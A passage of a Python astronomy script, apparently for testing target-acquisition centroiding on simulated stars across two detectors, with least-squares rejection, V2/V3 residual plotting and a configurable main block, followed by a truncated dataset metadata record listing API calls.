Tbench_Vs_list[1])\n\n Tbench_Vs = [Tbench_V2_3, Tbench_V3_3, Tbench_V2_5, Tbench_V3_5, Tbench_V2_7, Tbench_V3_7]\n T_Vs = [TV2_3, TV3_3, TV2_5, TV3_5, TV2_7, TV3_7]\n T_diffVs = [TdiffV2_3, TdiffV3_3, TdiffV2_5, TdiffV3_5, TdiffV2_7, TdiffV3_7]\n new_stars_sample = ridstars_LSrejection(stars_sample, LS_info)\n\n return case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info\n\n\ndef rid_rejected_elements(rejected_elementsLS, TV2, TV3, TrueV2, TrueV3):\n TV2_cwin, TV3_cwin, TrueV2_cwin, TrueV3_cwin = [], [], [], []\n for idx, tv in enumerate(TV2):\n if idx in rejected_elementsLS:\n\n continue\n else:\n TV2_cwin.append(tv)\n TV3_cwin.append(TV3[idx])\n TrueV2_cwin.append(TrueV2[idx])\n TrueV3_cwin.append(TrueV3[idx])\n return TV2_cwin, TV3_cwin, TrueV2_cwin, TrueV3_cwin\n\n\ndef ridstars_LSrejection(stars_sample, LS_info):\n # unfold variables\n _, rejected_elementsLS = LS_info\n # Create a new list with the elements not rejected by the least squares routine\n nw_stars_sample3, nw_stars_sample5, nw_stars_sample7 = [], [], []\n # append to the new lists for centroid window 3\n for i, st in enumerate(stars_sample):\n if i not in rejected_elementsLS[0]:\n nw_stars_sample3.append(st)\n if i not in rejected_elementsLS[1]:\n nw_stars_sample5.append(st)\n if i not in rejected_elementsLS[2]:\n nw_stars_sample7.append(st)\n new_stars_sample = [nw_stars_sample3, nw_stars_sample5, nw_stars_sample7]\n return new_stars_sample\n\n\ndef convert2milliarcsec(list2convert):\n for i, item in enumerate(list2convert):\n list2convert[i] = item * 1000.0\n return list2convert\n\n\ndef run_testXrandom_stars(stars_sample, primary_params, secondary_params, path4results, gen_path, extra_string):\n '''\n This is the function that coordinates all other functions within this script. It runs the script.\n Args:\n stars_sample: list of stars to analyze\n primary_params: list of 3 lists containing all variables in the primary parameters section\n secondary_params: list of 3 lists containing all variables in the secondary parameters section\n path4results: string of the path to place results\n gen_path: string of path to put plots and other resulting files\n extra_string: additional info added to name of text file with final V2 and V3\n\n Returns:\n results per window size = resulting V2 and V3, benchmark V2 and V3, the corresponding standard deviations,\n the rotation angle, the total number of stars removed as well as the corresponding\n star number, and the total number of iterations\n All of these results are in the following structure:\n results_of_test = [case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info] --> per TEST\n results_all_tests = [results_of_test, ...] --> can have only one list if only 1 test was ran\n '''\n\n # Unfold variables\n # primary parameters\n primary_params1, primary_params2, primary_params3 = primary_params\n do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results, show_pixpos_and_v23_plots, save_text_file = primary_params1\n save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample, scene, background_method, background2use = primary_params2\n shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements, max_iters_Nsig = primary_params3\n # secondary parameters\n secondary_params1, secondary_params2, secondary_params3 = secondary_params\n checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose = secondary_params1\n debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp = secondary_params2\n Pier_corr, tilt, backgnd_subtraction_method, random_sample = secondary_params3\n\n # Pool of stars to select from\n stars_detectors = range(1, 201) # default is for both detectors\n if detector == 491:\n stars_detectors = range(101, 201) # only detector 491\n elif detector == 492:\n stars_detectors = range(1, 101) # only detector 492\n\n # Loop over list_test2perform\n results_all_tests = []\n if test2perform == \"all\":\n list_test2perform = [\"T1\", \"T2\", \"T3\"]\n if not keep_bad_stars:\n # remove the bad stars and use the same sample for the 3 tests\n stars_sample = TAf.remove_bad_stars(scene, stars_sample, keep_ugly_stars, verbose)\n # but keep the sample stars list with length of desired number of stars\n while len(stars_sample) != stars_in_sample:\n random_star = random.choice(stars_detectors)\n stars_sample.append(random_star)\n stars_sample = list(set(stars_sample))\n # remove the bad stars\n stars_sample = TAf.remove_bad_stars(scene, stars_sample, keep_ugly_stars, verbose)\n keep_bad_stars = True\n else:\n list_test2perform = [test2perform]\n for test2perform in list_test2perform:\n print ('Starting analysis for TEST %s ...' % (test2perform))\n # RE-compact variables\n primary_params1 = [do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results,\n show_pixpos_and_v23_plots, save_text_file]\n primary_params2 = [save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample,\n scene, background_method, background2use]\n primary_params3 = [shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements,\n max_iters_Nsig]\n primary_params = [primary_params1, primary_params2, primary_params3]\n secondary_params1 = [checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose]\n secondary_params2 = [debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp]\n secondary_params3 = [Pier_corr, tilt, backgnd_subtraction_method, random_sample]\n secondary_params = [secondary_params1, secondary_params2, secondary_params3]\n # Get centroids AND sky positions according to Test\n case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info = runXrandomstars(stars_detectors,\n primary_params, secondary_params,\n stars_sample,\n path4results=path4results,\n extra_string=extra_string)\n results_of_test = [case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info]\n results_all_tests.append(results_of_test)\n print ('TEST %s finished. \\n' % (test2perform))\n\n\n if do_plots:\n print ('Generating plots...')\n\n # load the data fom the 3 tests\n for resTest in results_all_tests:\n # unfold variables per centroid window results_all_tests[0][5][s][width]\n case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, _ = resTest\n nw_stars_sample3, nw_stars_sample5, nw_stars_sample7 = new_stars_sample\n Tbench_V2_3, Tbench_V3_3, Tbench_V2_5, Tbench_V3_5, Tbench_V2_7, Tbench_V3_7 = Tbench_Vs\n TV2_3, TV3_3, TV2_5, TV3_5, TV2_7, TV3_7 = T_Vs\n TdiffV2_3, TdiffV3_3, TdiffV2_5, TdiffV3_5, TdiffV2_7, TdiffV3_7 = T_diffVs\n TLSsigmas_3, TLSsigmas_5, TLSsigmas_7, TLSdeltas_3, TLSdeltas_5, TLSdeltas_7 = LS_res\n\n milliarcsec = True\n if milliarcsec:\n TdiffV2_3 = convert2milliarcsec(TdiffV2_3)\n TdiffV3_3 = convert2milliarcsec(TdiffV3_3)\n TdiffV2_5 = convert2milliarcsec(TdiffV2_5)\n TdiffV3_5 = convert2milliarcsec(TdiffV3_5)\n TdiffV2_7 = convert2milliarcsec(TdiffV2_7)\n TdiffV3_7 = convert2milliarcsec(TdiffV3_7)\n TLSsigmas_3 = convert2milliarcsec(TLSsigmas_3)\n TLSsigmas_5 = convert2milliarcsec(TLSsigmas_5)\n TLSsigmas_7 = convert2milliarcsec(TLSsigmas_7)\n TLSdeltas_3 = convert2milliarcsec(TLSdeltas_3)\n TLSdeltas_5 = convert2milliarcsec(TLSdeltas_5)\n TLSdeltas_7 = convert2milliarcsec(TLSdeltas_7)\n\n # do the plots -> 2 plots per centroid window\n for cwin in xwidth_list:\n cwincase = case+'_CentroidWindow'+repr(cwin)\n\n # Plot to compare the mean values for the 3 tests -- plot only has 3 points\n plot_title = r'Residual Mean Values, $\\mu$'\n xlabel = r'$\\Delta$V2 [marcsec]'\n ylabel = r'$\\Delta$V3 [marcsec]'\n destination = os.path.join(gen_path, 'plots/means_Cwin'+repr(cwin)+'.jpg')\n if cwin == 3:\n s, d, v = 0, 3, 0\n if cwin == 5:\n s, d, v = 1, 4, 2\n if cwin == 7:\n s, d, v = 2, 5, 4\n if len(list_test2perform) != 3:\n T1sigmaV2 = results_all_tests[0][5][s][0] # Test ran sigma V2 value\n T1sigmaV3 = results_all_tests[0][5][s][1] # Test ran sigma V3 value\n T1meanV3 = results_all_tests[0][5][d][1] # Test ran mean V3 value\n T1meanV2 = results_all_tests[0][5][d][0] # Test ran mean V2 value\n if test2perform == \"T1\":\n labels_list = ['Avg in Pixel Space']\n if test2perform == \"T2\":\n labels_list = ['Avg in Sky']\n if test2perform == \"T3\":\n labels_list = ['No Avg']\n arrx = [T1meanV2]\n arry = [T1meanV3]\n print_side_values = [T1sigmaV2, T1meanV2, T1sigmaV3, T1meanV3]\n if len(list_test2perform) == 3:\n T1sigmaV2 = results_all_tests[0][5][s][0] # Test 1 ran sigma V2 value\n T1sigmaV3 = results_all_tests[0][5][s][1] # Test 1 ran sigma V3 value\n T1meanV3 = results_all_tests[0][5][d][1] # Test 1 ran mean V3 value\n T1meanV2 = results_all_tests[0][5][d][0] # Test 1 ran mean V2 value\n T2sigmaV2 = results_all_tests[1][5][s][0] # Test 2\n T2sigmaV3 = results_all_tests[1][5][s][1] # Test 2\n T2meanV2 = results_all_tests[1][5][d][0] # Test 2\n T2meanV3 = results_all_tests[1][5][d][1] # Test 2\n T3sigmaV2 = results_all_tests[2][5][s][0] # Test 3\n T3sigmaV3 = results_all_tests[2][5][s][1] # Test 3\n T3meanV2 = results_all_tests[2][5][d][0] # Test 3\n T3meanV3 = results_all_tests[2][5][d][1] # Test 3\n labels_list = ['Avg in Pixel Space', 'Avg in Sky', 'No Avg']\n arrx = [T1meanV2, T2meanV2, T3meanV2]\n arry = [T1meanV3, T2meanV3, T3meanV3]\n print_side_values = [T1sigmaV2, T1meanV2, T2sigmaV2, T2meanV2, T3sigmaV2, T3meanV2,\n T1sigmaV3, T1meanV3, T2sigmaV3, T2meanV3, T3sigmaV3, T3meanV3]\n print_side_string = ['V2$\\mu$ [marcsec]', 'V3$\\mu$ [marcsec]']\n # determine which one is larger\n if np.abs(T1meanV2) > np.abs(T1meanV3):\n largV = np.abs(T1meanV2)+np.abs(T1meanV2)*0.5\n else:\n largV = np.abs(T1meanV3)+np.abs(T1meanV3)*0.5\n xlims, ylims = [-1*largV, largV], [-1*largV, largV]\n\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination)\n\n\n # Graphical display of the standard deviation\n plot_title = r'Graphical Display of the Standard Deviation, $\\sigma$'\n destination = os.path.join(gen_path, 'plots/V2V3_Cwin'+repr(cwin)+'.jpg')\n if len(list_test2perform) == 3:\n arrx = [results_all_tests[0][4][v], results_all_tests[1][4][v], results_all_tests[2][4][v]]\n arry = [results_all_tests[0][4][v+1], results_all_tests[1][4][v+1], results_all_tests[2][4][v+1]]\n # determine which one is larger\n maxx = max(np.abs(results_all_tests[2][4][v]))\n maxy = max(np.abs(results_all_tests[2][4][v+1]))\n new_stars_sample = [results_all_tests[0][1][s], results_all_tests[1][1][s], results_all_tests[2][1][s]]\n else:\n arrx = [results_all_tests[0][4][v]]\n arry = [results_all_tests[0][4][v+1]]\n # determine which one is larger\n maxx = max(np.abs(results_all_tests[0][4][v]))\n maxy = max(np.abs(results_all_tests[0][4][v+1]))\n new_stars_sample = [results_all_tests[0][1][s]]\n if maxx > maxy:\n largsig = maxx + maxx*0.5\n else:\n largsig = maxy + maxy*0.5\n xlims, ylims = [-1*largsig, largsig], [-1*largsig, largsig]\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination,\n star_sample=new_stars_sample)\n\n return results_all_tests\n\n\n\n#######################################################################################################################\n\n\n### CODE\n\nif __name__ == '__main__':\n\n\n # SET PRIMARY PARAMETERS\n do_plots = True # 1. Least squares plot in V2/V3 space showing the true position (0,0)\n # and the mean of the three calculation cases: Averaging in pixel space,\n # averaging on sky, and no averaging : True or False\n # 2. Same plot but instead of the mean show all stars in one 20star calculation\n save_plots = False # Save the plots? True or False\n show_plots = True # Show the plots? True or False\n detector = 'both' # Integer (491 or 492) OR string, 'both' to select stars from both detectors\n output_full_detector = True # Give resulting coordinates in terms of full detector: True or False\n show_onscreen_results = True # Want to show on-screen resulting V2s, V3s and statistics? True or False\n show_pixpos_and_v23_plots = False # Show the plots of x-y and v2-v3 residual positions?\n save_text_file = False # Want to save the text file of comparison? True or False\n save_centroid_disp = False # Save the display with measured and true positions?\n keep_bad_stars = False # Keep the bad stars in the sample (both positions measured wrong)? True or False\n keep_ugly_stars = True # Keep the ugly stars (one position measured wrong)? True or False\n perform_abs_threshold = False # Perform abs_threshold routine (True) or only perform least squares routine (False)\n stars_in_sample = 5 # Number of stars in sample (165 for all good and uglies)\n scene = 1 # Integer or string, scene=1 is constant Mag 23, scene=2 is stars with Mag 18-23\n background_method = 'frac' # Select either 'fractional', 'fixed', or None\n background2use = 0.3 # Background to use for analysis: None or float\n shutters = \"rapid\" # Shutter velocity, string: \"rapid\" or \"slow\"\n noise = \"real\" # Noise level, string: \"nonoise\" or \"real\"\n filter_input = \"F140X\" # Filter, string: for now only test case is \"F140X\"\n test2perform = \"all\" # Test to perform, string: \"all\", \"T1\", \"T2\", \"T3\" for test 1, 2, and 3, respectively\n Nsigma = 2.5 # N-sigma rejection of bad stars: integer or float\n abs_threshold = 0.32 # threshold to reject points after each iteration of least squares routine, default=0.32\n min_elements = 4 # minimum number of elements in the absolute threshold least squares routine, default=4\n max_iters_Nsig = 10 # Max number of iterations for N-sigma function: integer\n\n # SET SECONDARY PARAMETERS THAT CAN BE ADJUSTED\n checkbox_size = 3 # Real checkbox size\n xwidth_list = [3, 5, 7] # Number of rows of the centroid region\n ywidth_list = [3, 5, 7] # Number of columns of the centroid region\n vlim = (1, 100) # Sensitivity limits of image, i.e. (0.001, 0.1)\n threshold = 0.01 # Convergence threshold of accepted difference between checkbox centroid and coarse location\n max_iter = 10 # Maximum number of iterations for finding coarse location\n verbose = False # Show some debug messages (i.e. resulting calculations)\n debug = False # See all debug messages (i.e. values of variables and calculations)\n arcsecs = True # Final units in arcsecs? True or False (=degrees)\n determine_moments = False # Want to determine 2nd and 3rd moments?\n display_master_img = False # Want to see the combined ramped images for every star?\n show_centroids = False # Print measured centroid on screen: True or False\n show_disp = False # Show display of resulting positions? (will show 2 figs, same but different contrast)\n Pier_corr = True # Include Pier's corrections to measured positions\n tilt = False # Tilt angle: True or False\n backgnd_subtraction_method = 1 # 1 = Do background subtraction on final image (after subtracting 3-2 and 2-1),\n # before converting negative values into zeros\n # 2 = Do background subtraction on 3-2 and 2-1 individually\n # None = Do not subtract background\n\n random_sample = False # choose a random sample of stars from either detector: True or False\n # control samples to be used when random is set to False\n #stars_sample = [1, 10, 23, 29, 33, 47, 61, 67, 95, 100, 107, 128, 133, 139, 151, 171, 190, 194, 195, 198]\n #stars_sample = [9, 20, 32, 48, 65, 69, 82, 83, 93, 98, 99, 107, 111, 126, 128, 136, 172, 176, 196, 198] #all good stars\n #stars_sample = [3, 26, 32, 38, 46, 48, 51, 65, 75, 84, 92, 96, 121, 122, 132, 133, 160, 174, 186, 194]\n #stars_sample = [3, 8, 9, 32, 38, 65, 96, 128, 132, 133, 136, 143, 145, 147, 160, 175, 178, 191, 193, 194] #all good stars\n #stars_sample = [32, 41, 49, 64, 65, 68, 84, 96, 99, 104, 131, 167, 175, 182, 192, 194, 195, 196, 197, 198]# all good\n #stars_sample = [2, 4, 5, 6, 11, 32, 38, 47, 81, 127, 129, 136, 138, 141, 160, 163, 166, 171, 174, 179] #* all good\n #stars_sample = [6, 18, 41, 49, 66, 75, 84, 93, 97, 99, 108, 110, 134, 140, 151, 160, 164, 175, 186, 200]# VERY good!\n #stars_sample = [15, 20, 43, 46, 47, 57, 62, 69, 71, 83, 86, 87, 90, 106, 121, 168, 179, 182, 185, 194]\n #stars_sample = [4, 42, 44, 69, 76, 96, 97, 99, 102, 114, 116, 128, 129, 130, 132, 142, 167, 176, 193, 194] # good to show bads\n stars_sample = [1, 128, 130, 131, 196]\n #stars_sample = [1, 35, 128, 130, 164]\n #stars_sample = [3, 4, 8, 32, 139]\n #stars_sample = [32, 33, 104, 188, 199]\n #stars_sample = [3, 32, 33, 133, 162]\n #stars_sample = [16, 22, 29, 50, 108]\n #stars_sample = [2, 5, 15, 46, 154, 156, 163]\n #stars_sample = [5, 80, 116, 130, 135]#, 17, 31, 113, 182]\n #stars_sample = [8, 11, 27, 44, 90]\n #stars_sample = [12, 21, 32, 54, 77]\n ##stars_sample = [22, 90, 108, 126, 145]\n #stars_sample = [101, 110, 121, 133, 200]\n #stars_sample = [111, 120, 142, 173, 180]\n #stars_sample = [10, 32, 33, 35, 42, 47, 52, 70, 73, 77, 100, 128, 130, 135, 136, 137, 141, 147, 179, 192] # all good stars *\n #stars_sample = [8, 33, 37, 38, 44, 50, 51, 54, 63, 98, 99, 109, 114, 127, 138, 139, 162, 163, 171, 186]\n #stars_sample = [3, 16, 35, 36, 39, 64, 65, 70, 73, 90, 111, 122, 129, 134, 136, 154, 165, 183, 194, 196]\n #stars_sample = [2, 4, 6, 11, 36, 38, 43, 98, 102, 109, 110, 141, 149, 160, 161, 163, 165, 173, 174, 177]\n #stars_sample = [5, 7, 8, 12, 33, 37, 40, 101, 108, 109, 111, 151, 159, 162, 166, 167, 169, 170, 175, 187]\n # bad samples:\n #stars_sample = [7, 24, 51, 56, 66, 68, 71, 72, 74, 91, 106, 109, 120, 125, 127, 128, 138, 154, 187, 188]\n #stars_sample = [8, 9, 20, 21, 39, 40, 46, 54, 58, 76, 78, 87, 88, 121, 134, 146, 150, 167, 179, 180]\n # OLNY detector 491\n #stars_sample = [101, 105, 108, 109, 111, 113, 114, 133, 136, 147, 150, 157, 158, 161, 181, 184, 185, 186, 194, 199]\n #stars_sample = [101, 104, 105, 112, 117, 118, 133, 135, 136, 140, 145, 151, 152, 157, 159, 161, 174, 178, 184, 200]\n #stars_sample = [109, 114, 128, 135, 136, 145, 149, 153, 160, 166, 171, 174, 176, 177, 193, 194, 195, 198, 199, 200]\n #stars_sample = [101, 102, 104, 107, 117, 128, 130, 131, 132, 135, 136, 137, 141, 154, 167, 184, 185, 186, 187, 193]#*\n # ONLY detector 492\n ##stars_sample = [8, 11, 19, 24, 30, 37, 39, 41, 48, 51, 55, 65, 73, 85, 87, 88, 90, 91, 93, 98]\n #stars_sample = [2, 4, 8, 10, 11, 22, 25, 28, 33, 37, 54, 64, 68, 76, 80, 89, 96, 97, 99, 100]\n # all stars of one detector or both\n #stars_sample = [s+1 for s in range(200)]\n # Known bad stars in X and Y: 103, 105, 106, 112, 134, 152, 156, 170, 188\n #6, 23, 50, 55, 65, 67, 70, 71, 73, 90, 105, 108, 119, 124, 126, 127, 137, 153, 186, 187\n\n\n\n ######################################################\n\n ### CODE\n\n continue_code = True\n if not perform_abs_threshold and min_elements!=4:\n print ('***** You are running the code with min_elements =', min_elements, ' and No absolute threshold, ')\n continue_code = raw_input(' Do you wish to continue? y [n]')\n if continue_code == 'y':\n raw_input('Ok, continuing... but the output files will not have a marker to know the number of minimum '\n 'elements allowed in the absolute threshold routine. Press enter')\n else:\n exit()\n\n # start the timer to compute the whole running time\n start_time = time.time()\n\n # make sure that bad stars are gone if ugly stars are to be gone as well\n if not keep_ugly_stars:\n keep_bad_stars = False\n\n # Set variable as it appears defined in function\n if perform_abs_threshold:\n just_least_sqares = False # Only perform least squares routine = True, perform abs_threshold routine = False\n else:\n just_least_sqares = True\n\n # set paths\n gen_path = os.path.abspath('../resultsXrandomstars')\n path4results = \"../resultsXrandomstars/\"\n\n # Compact variables\n primary_params1 = [do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results,\n show_pixpos_and_v23_plots, save_text_file]\n primary_params2 = [save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample,\n scene, background_method, background2use]\n primary_params3 = [shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements,\n max_iters_Nsig]\n primary_params = [primary_params1, primary_params2, primary_params3]\n secondary_params1 = [checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose]\n secondary_params2 = [debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp]\n secondary_params3 = [Pier_corr, tilt, backgnd_subtraction_method, random_sample]\n secondary_params = [secondary_params1, secondary_params2, secondary_params3]\n\n\n # Run main function of script\n extra_string = None\n results_all_tests = run_testXrandom_stars(stars_sample, primary_params, secondary_params, path4results,\n gen_path, extra_string)\n\n\n\n '''\n common3files = '_results_'+case+'.txt'\n test_fileT1 = os.path.join(gen_path, 'T1'+common3files)\n test_fileT2 = os.path.join(gen_path, 'T2'+common3files)\n test_fileT3 = os.path.join(gen_path, 'T3'+common3files)\n txt_files = [test_fileT1, test_fileT2, test_fileT3]\n T1V2_3, T1V3_3, T1V2_5, T1V3_5, T1V2_7, T1V3_7, T1TrueV2, T1TrueV3 = np.loadtxt(test_fileT1, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n T2V2_3, T2V3_3, T2V2_5, T2V3_5, T2V2_7, T2V3_7, T2TrueV2, T2TrueV3 = np.loadtxt(test_fileT2, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n T3V2_3, T3V3_3, T3V2_5, T3V3_5, T3V2_7, T3V3_7, T3TrueV2, T3TrueV3 = np.loadtxt(test_fileT3, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n # for test3 we only compare to position 1 because this is how the cutouts were made in order to see the shift\n\n ls_dataTESTS = []\n for i, Tfile in enumerate(txt_files):\n ls_data = prs.load_rejected_stars(Tfile)\n ls_dataTESTS.append(ls_data) # ls_dataTESTS = list of 3 dictionaries, one per file\n # (each dictionay contains 3 dictionaries, one per centroid window,\n # the keyes per centroid window are: detla_theta, delta_x, delta_y,\n # elements_left, iteration, sigma_theta, sigma_x, and sigma_y. For the\n # dictionary of one of the text files, to access centroid 5, iterations\n # type: ls_data['5']['iterations']\n\n\n # do the plots -> 2 plots per centroid window\n for cwin in xwidth_list:\n cwincase = case+'_CentroidWindow'+repr(cwin)\n\n # Plot to compare the mean values for the 3 tests -- plot only has 3 points\n plot_title = r'Residual Mean Values, $\\mu$'\n xlabel = r'$\\Delta$V2 [marcsec]'\n ylabel = r'$\\Delta$V3 [marcsec]'\n destination = os.path.join(gen_path, 'plots/means_Cwin'+repr(cwin)+'.jpg')\n T1sigmaV2 = ls_dataTESTS[0][str(cwin)]['sigma_x'] # Test 1 sigma V2 value\n T2sigmaV2 = ls_dataTESTS[1][str(cwin)]['sigma_x'] # Test 2\n T3sigmaV2 = ls_dataTESTS[2][str(cwin)]['sigma_x'] # Test 3\n T1sigmaV3 = ls_dataTESTS[0][str(cwin)]['sigma_y'] # Test 1 sigma V3 value\n T2sigmaV3 = ls_dataTESTS[1][str(cwin)]['sigma_y'] # Test 2\n T3sigmaV3 = ls_dataTESTS[2][str(cwin)]['sigma_y'] # Test 3\n T1meanV2 = ls_dataTESTS[0][str(cwin)]['delta_x'] # Test 1 mean V2 value\n T2meanV2 = ls_dataTESTS[1][str(cwin)]['delta_x'] # Test 2\n T3meanV2 = ls_dataTESTS[2][str(cwin)]['delta_x'] # Test 3\n T1meanV3 = ls_dataTESTS[0][str(cwin)]['delta_y'] # Test 1 mean V3 value\n T2meanV3 = ls_dataTESTS[1][str(cwin)]['delta_y'] # Test 2\n T3meanV3 = ls_dataTESTS[2][str(cwin)]['delta_y'] # Test 3\n arrx = [T1meanV2*1000.0, T2meanV2*1000.0, T3meanV2*1000.0]\n arry = [T1meanV3*1000.0, T2meanV3*1000.0, T3meanV3*1000.0]\n labels_list = ['Avg in Pixel Space', 'Avg in Sky', 'No Avg']\n print_side_string = ['V2$\\mu$ [marcsec]', 'V3$\\mu$ [marcsec]']\n print_side_values = [T1sigmaV2*1000.0, T1sigmaV3*1000.0,\n T2sigmaV2*1000.0, T2sigmaV3*1000.0,\n T3sigmaV2*1000.0, T3sigmaV3*1000.0,\n T1meanV2*1000.0, T1meanV3*1000.0,\n T2meanV2*1000.0, T2meanV3*1000.0,\n T3meanV2*1000.0, T3meanV3*1000.0]\n xlims = [-5.0, 5.0]\n ylims = [-5.0, 5.0]\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination)\n\n # Graphical display of the standard deviation\n plot_title = r'Graphical Display of the Standard Deviation, $\\sigma$'\n destination = os.path.join(gen_path, 'plots/V2V3_Cwin'+repr(cwin)+'.jpg')\n if cwin == 3:\n T1V2, T2V2, T3V2 = T1V2_3-T1TrueV2, T2V2_3-T2TrueV2, T3V2_3-T3TrueV2\n T1V3, T2V3, T3V3 = T1V3_3-T1TrueV3, T2V3_3-T2TrueV3, T3V3_3-T3TrueV3\n elif cwin == 5:\n T1V2, T2V2, T3V2 = T1V2_5-T1TrueV2, T2V2_5-T2TrueV2, T3V2_5-T3TrueV2\n T1V3, T2V3, T3V3 = T1V3_5-T1TrueV3, T2V3_5-T2TrueV3, T3V3_5-T3TrueV3\n elif cwin == 7:\n T1V2, T2V2, T3V2 = T1V2_7-T1TrueV2, T2V2_7-T2TrueV2, T3V2_7-T3TrueV2\n T1V3, T2V3, T3V3 = T1V3_7-T1TrueV3, T2V3_7-T2TrueV3, T3V3_7-T3TrueV3\n arrx = [T1V2, T2V2, T3V2]\n arry = [T1V3, T2V3, T3V3]\n xlims = [-20., 20.]\n ylims = [-20., 20.]\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination,\n star_sample=stars_sample)\n '''\n\n print (\"\\n Script 'testXrandom_stars.py' finished! Took %s seconds to finish. \\n\" % (time.time() - start_time))\n", "sub_path": "testXrandom_stars.py", "file_name": "testXrandom_stars.py", "file_ext": "py", "file_size_in_byte": 82025, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.choice", "line_number": 139, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 145, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 147, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 152, "usage_type": "call"}, {"api_name": "TA_functions.read_star_param_files", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 209, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 263, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 266, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "TA_functions.get_raw_star_directory", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 370, "usage_type": "call"}, {"api_name": "os.path", "line_number": 370, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.getdata", "line_number": 394, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 394, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 396, "usage_type": "call"}, {"api_name": "TA_functions.readimage", "line_number": 399, "usage_type": "call"}, {"api_name": "TA_functions.run_recursive_centroids", "line_number": 401, "usage_type": "call"}, {"api_name": "TA_functions.centroid2fulldetector", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": "TA_functions.readimage", "line_number": 422, 